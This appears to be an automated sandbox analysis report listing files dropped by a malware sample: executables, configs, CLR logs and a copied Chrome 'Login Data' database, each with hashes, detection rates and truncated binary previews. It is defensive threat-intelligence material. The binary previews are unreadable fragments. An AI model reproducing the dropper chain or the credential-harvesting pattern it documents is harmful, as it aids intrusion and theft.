                                                              Preview: <?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v2.0.50727"/>.. .. <supportedRuntime version="v3.5"/> "The .NET Framework version 3.0 and 3.5 use version 2.0.50727 of the CLR.".. -->.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0,Profile=Client" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.1,Profile=Client" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.1" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.2,Profile=Client" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.2" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.3,Profile=Client" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.3" />.. <supportedRuntime version="v4
                                                              C:\Program Files\89C8W4UQTF\uninstaller.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):310784
                                                              Entropy (8bit):6.085741699285741
                                                              Encrypted:false
                                                              SSDEEP:6144:5BqK7a8lON/DMHSs8feVtDdqMmE36eUJTAUHEGzQJ5QpEbBm/CpfHr:5BqKOobyGpHejJT3Fzq5gO5pfL
                                                              MD5:12B3B48933978FEBB658A785ACFB13CF
                                                              SHA1:54C62741F2270BE1731E5DD1998F4334D474A540
                                                              SHA-256:13131DB30904FC8CA3B1AEF681CD44FB8018ECD9075411CCCA12EDEB611615D7
                                                              SHA-512:2628FCAB2647E90BB94D26C8845B808971A3BC55C2A827600C3A837350B96AA2A6749852CD456E08BBE271377E1F83941F226B258574B6CEC51CE3ECBAA40020
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Reputation:low
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?:..........."...0.................. ........@.. ....................... ............@.....................................O.......@...........................0...8............................................ ............... ..H............text...$.... ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B........................H........"..`............2..(............................................0..............!.....(.....(.......(....~....o....o.......o.......o.....o....o......s...........s.........s.........o ......2..,...o!.......,...o!.......,...o!......,..o!.......*..4....f..r........\.#.........P.<...................".("....*.r...p.....r#..p.....r5..p.....rG..p.....*..0..q...........!....(#...r...po$...s....o ...(....(......(%...o&...r...po'....(%....o(...t.............%.....o)...&........
                                                              C:\Program Files\89C8W4UQTF\uninstaller.exe.config
                                                              Process:C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1810
                                                              Entropy (8bit):5.029991107025393
                                                              Encrypted:false
                                                              SSDEEP:24:2dZmhW3aXfygeOygjOgC5XgtXdXkBHnUdQzFDWby2GpyI:cccAfyge7gjOgCNgBRkBHUdQzqQ
                                                              MD5:A2EBF843442988EE2D667E9C7FC28CE1
                                                              SHA1:7F24C475BB217C448090DCE593ABEE8957B7B1D4
                                                              SHA-256:8A0D5D6C5AB131BAB9C8A29A7BCC81D6470EC515F2E4BCA977A4FE62FD156ACC
                                                              SHA-512:1B56DB588131023F427E0476582E3381A818D9659C75B34D094630909482D1A540480F95CF663C1700B2D54431C5539D969EBD332A3F017BE29A8212872D2B84
                                                              Malicious:true
                                                              Reputation:low
                                                              Preview: <?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v2.0.50727"/>.. .. <supportedRuntime version="v3.5"/> "The .NET Framework version 3.0 and 3.5 use version 2.0.50727 of the CLR.".. -->.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0,Profile=Client" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.1,Profile=Client" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.1" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.2,Profile=Client" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.2" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.3,Profile=Client" />.. <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.3" />.. <supportedRuntime version="v4
                                                              C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data1
                                                              Process:C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.792852251086831
                                                              Encrypted:false
                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\multitimer.exe.log
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):758
                                                              Entropy (8bit):5.223424380940924
                                                              Encrypted:false
                                                              SSDEEP:12:Q3LaJcP0kaHYGLi1B01kKVdisk70hK9C4XXhK9yi0z6+xai0ELv:MLfaYgioQ6K/XhKoRt
                                                              MD5:62B0EEFF6FD512178D0FED52F80EB053
                                                              SHA1:13162759E7F5055A23D9A80BCBE40F2029733B3B
                                                              SHA-256:9F4778089C9C3DA87BFD0BD1809FAC2CDF2860B71CFAF9D78B89875F66B40C0C
                                                              SHA-512:649BA3D6997BD60FFF226D9F4905012C1162C09DEABE060B2E66216BE91D1EE2D826A1B58397A151292A6DDCFCD2B651BD63F9518CD38828915C3245E8C376C5
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\b12bbcf27f41d96fe44360ae0b566f9b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\454c09ea87bde1d5f545d60232083b79\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\93e312980de126a432df42707b07336c\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\e681e359556f0991834c31646ebd5526\System.Xml.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\e1a7c69e45e7d55c1e531bb6e9526824\System.Data.ni.dll",0..
                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\tpwlxkeo40z.exe.log
                                                              Process:C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):380
                                                              Entropy (8bit):5.226600785864345
                                                              Encrypted:false
                                                              SSDEEP:6:Q3LadLCDDXTg+Q+OLCYK9C4dV2YlzK9yiOLCs6+uAbOiv:Q3LaJcP0hK9C4XXhK9yi0z6+xaiv
                                                              MD5:D6988CDBCD92594C5A8F23D7A2567BFB
                                                              SHA1:E04D1384C77906897C6D1F5B96324C8579E95FF3
                                                              SHA-256:8CBDD6F8BAFB8A402AD10D5B069CBFAD0E2E034E6BCB5F8C6D56842A08C1DB9A
                                                              SHA-512:08FEAB8AFDC359A7458B3A4EE0114CBECBC6BC21FC4F6D5E0095E526565062152B9AB32005F39914A0228B296E7800FC6FF8C697F3195CF7380BE5F2917F83F2
                                                              Malicious:false
                                                              Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\93e312980de126a432df42707b07336c\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\e681e359556f0991834c31646ebd5526\System.Xml.ni.dll",0..
                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\2mqvpn30gyk.exe.log
                                                              Process:C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1281
                                                              Entropy (8bit):5.367899416177239
                                                              Encrypted:false
                                                              SSDEEP:24:ML9E4KrgKDE4KGKN08AKha1qE4GiD0E4KeGiKIE4TKD1KoZAE4KKPz:MxHKEYHKGD8Aoa1qHGiD0HKeGitHTG1Q
                                                              MD5:0FEC086554DBF3C4E7205D7913CCDA18
                                                              SHA1:C2FF919D834B2175BBF8308132F1FF8C69726770
                                                              SHA-256:F22CFD1C1A200B4FC7F71BCCDA4275069361241790A91BE65E1CD8935EDFDB47
                                                              SHA-512:3DEB6AFE2F99E4F13B9DD295710E9F15E16ECD506431234175F505072DBA6B025014A0C66AB321F5D2FA1C70DB8C9381544D4904FFB217D1C2CBF1A0E77359A4
                                                              Malicious:false
                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe.log
                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):847
                                                              Entropy (8bit):5.350326386662965
                                                              Encrypted:false
                                                              SSDEEP:24:ML9E4KrgKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKEYHKGD8AoPtHTG1hAHKKPz
                                                              MD5:8695FFB03DE68402BA23CADD1D71EF14
                                                              SHA1:67BBF40D11F0B1841FEE4F622E07855787065E0B
                                                              SHA-256:1F0942A2EECF4990E027C7D609E319ADCF4563F984DD0D8EF2B370A1817F3C1C
                                                              SHA-512:6EDEEAB5EF14473DF54251D69A3E2B7AC29778AEF929F8EC05F03008BF9AD629FE315115B22EDC09E92E1D7F2869CF9D4DDC6DB92C4158E92F80DEDA5A365098
                                                              Malicious:true
                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\e82398e9ff6885d617e4b97e31fb4f02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\f2e3165e3c718b7ac302fea40614c984\System.Xml.ni.dll",0..
                                                              C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):78336
                                                              Entropy (8bit):7.244203070790308
                                                              Encrypted:false
                                                              SSDEEP:1536:T3ckKSVogho+PTw/TPShe4Xl8iZDlJC1b:oUoGo+PWb6h9bJC5
                                                              MD5:0E5F029EB6ECABF1E593E12211887506
                                                              SHA1:B905E0A28ED76C0BB6F0871CC5FFFA2E7F99642A
                                                              SHA-256:77450DEC4277B5643CE97196289923C019E28A0EF9946324D924A6BB8833E7EC
                                                              SHA-512:AC42A24C4A0E34933466530AEBB86E01442070F7878614438732186C578296BD018E467868CE767FA8D32072C871F34DD7E221B38FFDC4E4967662F47F4FBAE3
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Metadefender, Detection: 30%, Browse
                                                              • Antivirus: ReversingLabs, Detection: 82%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............"...0.............^2... ...@....@.. ....................................@..................................2..O....@..|....................`.......1..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......0..............@..B................>2......H........6..$"...........X.................................................}.....(.......(.....r...p(....&*6.rk..p(....&*....0..+.........,..{.......+....,...{....o........(.....*..0..L.............(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....{....o......{....o......{....o......{....o......{.
                                                              C:\Users\user\AppData\Local\Temp\2vze2wqfnvj\installer.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2332000
                                                              Entropy (8bit):7.710319682123012
                                                              Encrypted:false
                                                              SSDEEP:49152:0qeNVO4AFpy6/dV7FuYuiiZQCu9f0BTHgXhfSUHq:BEY42x/NuBgJ0ZgXxxHq
                                                              MD5:57A499F8970931ED49142A0392846212
                                                              SHA1:6F9D93587B0508F278A7D1ED66590F50163A45BD
                                                              SHA-256:4101EB5D347E4D5DF349296B506BFA34443A7D43000902849A22545F455E23C0
                                                              SHA-512:A361DC8085D8CB35FFF1C8650C32E53F4CFD5A717369FD6F512497BE20AD6682270AE1C5CCC162FF56DB010D7D1F1E17869562A4AAED3B8D0E08D1D81C72C0C6
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 64%
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....m^.................P...........^.......p....@...................................#...@......@...................@....... ..6....p...F............#.P....................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc....F...p...F..................@..@....................................@..@........................................................
                                                              C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):15711928
                                                              Entropy (8bit):7.993466509508316
                                                              Encrypted:true
                                                              SSDEEP:393216:2fAlhvR8PZ5ECts3Rztsr5PSL0g7+Pgkt7/7DI:Dlhv2O1tfZi7//I
                                                              MD5:A9487E1960820EB2BA0019491D3B08CE
                                                              SHA1:349B4568DDF57B5C6C1E4A715B27029B287B3B4A
                                                              SHA-256:123C95CF9E3813BE75FE6D337B6A66F8C06898AE2D4B0B3E69E2E14954FF4776
                                                              SHA-512:DAB78AFF75017F039F7FEE67F3967BA9DD468430F9F1ECFFDE07DE70964131931208EE6DD97A19399D5F44D3AB8B5D21ABCD3D2766B1CAAF970E1BD1D69AE0DC
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: Metadefender, Detection: 8%, Browse
                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....ujP.................P..........xd.......p....@..................................I...........@......................................(............{...C..........................................................P...L............................text....C.......D.................. ..`.itext.......`.......H.............. ..`.data........p.......T..............@....bss....PW...........b...................idata...............b..............@....tls.................r...................rdata...............r..............@..@.rsrc...(............t..............@..@.....................&..............@..@........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\4sgbvongjvu\AwesomePoolE1.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):78336
                                                              Entropy (8bit):7.244203070790308
                                                              Encrypted:false
                                                              SSDEEP:1536:T3ckKSVogho+PTw/TPShe4Xl8iZDlJC1b:oUoGo+PWb6h9bJC5
                                                              MD5:0E5F029EB6ECABF1E593E12211887506
                                                              SHA1:B905E0A28ED76C0BB6F0871CC5FFFA2E7F99642A
                                                              SHA-256:77450DEC4277B5643CE97196289923C019E28A0EF9946324D924A6BB8833E7EC
                                                              SHA-512:AC42A24C4A0E34933466530AEBB86E01442070F7878614438732186C578296BD018E467868CE767FA8D32072C871F34DD7E221B38FFDC4E4967662F47F4FBAE3
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Metadefender, Detection: 30%, Browse
                                                              • Antivirus: ReversingLabs, Detection: 82%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............"...0.............^2... ...@....@.. ....................................@..................................2..O....@..|....................`.......1..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......0..............@..B................>2......H........6..$"...........X.................................................}.....(.......(.....r...p(....&*6.rk..p(....&*....0..+.........,..{.......+....,...{....o........(.....*..0..L.............(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....{....o......{....o......{....o......{....o......{.
                                                              C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):523264
                                                              Entropy (8bit):7.563751397617382
                                                              Encrypted:false
                                                              SSDEEP:12288:rYNuYh2ZRYMY7bixB9cV/RxPrijyDrx4hlsGBcNlA/:VmCRYLEBSV/IAr6hNn
                                                              MD5:E252EF40FF9D0A528918215DB75A8EB9
                                                              SHA1:7AF26058E02C0E9AF73898350C2BF8E522734A8D
                                                              SHA-256:E6A6A7C6B86784485C614F333026D3C9525EED04CD137DF67BBB65AC10381828
                                                              SHA-512:EA1189B51FD2AAF917D560FBED38BB6E7C49C72B909220CA184958F5A17E21FD39CE1B9E3A1BEF7BFCD6B1E047DDE39CAEE894C39A3FF578B1F57BE6AF8D5306
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 28%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4.)`.....................V........... ........@.. .......................`............@.................................`...W........S...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....S.......T..................@..@.reloc.......@......................@..B........................H.......hf...\..........<...,............................................(....(9...*..(....*>..{.....X}....*z.(......}.....(....o ...}....*..0...........{............3.....(.....*..................0..^........{......,...;.......D.....}.....s....}.....{.....{....}......}......}.....{..........s!......{...........s....%..}....%..}....o....}.......}....8......{....o....}......{....}......}.............}.....{....{.......{.......Y}.....{....{....-...+M.{........{....X.{....{....
                                                              C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe.config
                                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1860
                                                              Entropy (8bit):5.082358405175579
                                                              Encrypted:false
                                                              SSDEEP:24:2dHmh9J1IfyTlOyTsOTB5XTtIdcXCHnH2zUFBySGHyl:cGpOfyTl7TsOTBNTWSXCHH2zU3j
                                                              MD5:3F1498C07D8713FE5C315DB15A2A2CF3
                                                              SHA1:EF5F42FD21F6E72BDC74794F2496884D9C40BBFB
                                                              SHA-256:52CA39624F8FD70BC441D055712F115856BC67B37EFB860D654E4A8909106DC0
                                                              SHA-512:CB32CE5EF72548D1B0D27F3F254F4B67B23A0B662D0EF7AE12F9E3EF1B0A917B098368B434CAF54751C02C0F930E92CFFD384F105D8D79EE725DF4D97A559A3D
                                                              Malicious:true
                                                              Preview: <?xml version="1.0" encoding="utf-8" ?>....<configuration>.... <startup useLegacyV2RuntimeActivationPolicy="true">.... <supportedRuntime version="v2.0.50727"/>.... .... <supportedRuntime version="v3.5"/> "The .NET Framework version 3.0 and 3.5 use version 2.0.50727 of the CLR.".... -->.... <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0,Profile=Client" />.... <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0" />.... <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.1,Profile=Client" />.... <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.1" />.... <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.2,Profile=Client" />.... <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.2" />.... <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.3,Profile=Client" />.... <supportedRuntime version="v4.0" sku =".NETFramework,Version=v4.0.3" />....
                                                              C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):78336
                                                              Entropy (8bit):7.244203070790308
                                                              Encrypted:false
                                                              SSDEEP:1536:T3ckKSVogho+PTw/TPShe4Xl8iZDlJC1b:oUoGo+PWb6h9bJC5
                                                              MD5:0E5F029EB6ECABF1E593E12211887506
                                                              SHA1:B905E0A28ED76C0BB6F0871CC5FFFA2E7F99642A
                                                              SHA-256:77450DEC4277B5643CE97196289923C019E28A0EF9946324D924A6BB8833E7EC
                                                              SHA-512:AC42A24C4A0E34933466530AEBB86E01442070F7878614438732186C578296BD018E467868CE767FA8D32072C871F34DD7E221B38FFDC4E4967662F47F4FBAE3
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Metadefender, Detection: 30%, Browse
                                                              • Antivirus: ReversingLabs, Detection: 82%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............"...0.............^2... ...@....@.. ....................................@..................................2..O....@..|....................`.......1..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......0..............@..B................>2......H........6..$"...........X.................................................}.....(.......(.....r...p(....&*6.rk..p(....&*....0..+.........,..{.......+....,...{....o........(.....*..0..L.............(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....{....o......{....o......{....o......{....o......{.
                                                              C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):721408
                                                              Entropy (8bit):6.793648961271186
                                                              Encrypted:false
                                                              SSDEEP:12288:9p/S3sCPfhmxjjpmt0OlIhtYbJAvSq8ZlUfMcZMSIP/LrvfOh9lSPxTmg++K0E:TeSot0jOFAvS7ZufMcZMT/feh9lEN+4
                                                              MD5:57664817E1CE6474C6FB8201675AC09E
                                                              SHA1:C394CB4643EA0BC6AC762DA6D95F4910957E34CB
                                                              SHA-256:8DB01993653B78C7B862356616241C4C97ADCE8B705522CEFAC90B23E3572845
                                                              SHA-512:D8EA64D8D2F695165E0AA1519348277E93D65C0A19AA810110E49F8F2AA6F015FC892D78C1B4B7B2FD70F933120B9A9887C214DCBDDBD293B8EF5BBF2549C64D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ g..A.D.A.D.A.D.'.E.A.D.'.E.A.D.'.E.A.D.).E.A.D.).E.A.D.).E.A.D.'.E.A.D.A.D=A.D.(.E.A.D.(.D.A.D.(.E.A.DRich.A.D................PE..L....`.`.............................P............@.......................................@.....................................<................................M..........................@...........@...............0............................text....3.......4.................. ..`.txet.......P.......8.............. ..`.rdata..............................@..@.data...Ld..........................@....rsrc...............................@..@.reloc...M.......N..................@..B................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):3953664
                                                              Entropy (8bit):7.994147516216309
                                                              Encrypted:true
                                                              SSDEEP:98304:PiYh58RGLPb/m86SUfCA3vuM5f56uH+BeWy50T9VuOGd:q+58Erb/mLfCA3vuM5fbeQWihh
                                                              MD5:CA391A385DA53FAE727E8B060FCB05C3
                                                              SHA1:FF84B68D99BFE9871BEC9AFFF4F7D8B8D804826F
                                                              SHA-256:69758B50E1E988C3D3EB40FA75AF54FCA809EE80DBAD18729C2F7D659D840FEE
                                                              SHA-512:83A3846D0411CFBD5B772BC4D0A1D1410D8499677F38BEB57AD525507D55258D3A812749E908F8076700504903017818492677BFB3E33A00B0E527ACC89281E2
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&^..b?..b?..b?..|m6.x?..|m'.U?..|m ..?..E..g?..b?...?..|m).c?..|m1.c?..|m7.c?..|m2.c?..Richb?..................PE..L......^..................;..bx......3........;...@.................................!`<.............................p0<......%<.<.......8.............................................................................;..............................text...b.;.......;................. ..`.rdata...P....;..R....;.............@..@.data...HWw..@<.. ....<.............@....rsrc...8............8<.............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1188864
                                                              Entropy (8bit):6.330420574637555
                                                              Encrypted:false
                                                              SSDEEP:24576:LfBCw13MC2/8HmwB7nfoZarGKPO/HIO9:zBVx8b9
                                                              MD5:7504A339516D6AB6F35C55CD96810040
                                                              SHA1:4092FD230E20809D2D091976660FDCE49B171FF0
                                                              SHA-256:3CD0DDF012ACBDA18B37DF1E6EF4195D9BE15D6E58C97C7CC21CEABF54C32E56
                                                              SHA-512:A34A0F954BF02BE534FF85AB5789CFFE429729D5B71D8F47C2EF610B95D07E1C1D340FF648D04DBE99D02052BCFB63123E35A7A6584C18D4AE206DBF5050A4A4
                                                              Malicious:true
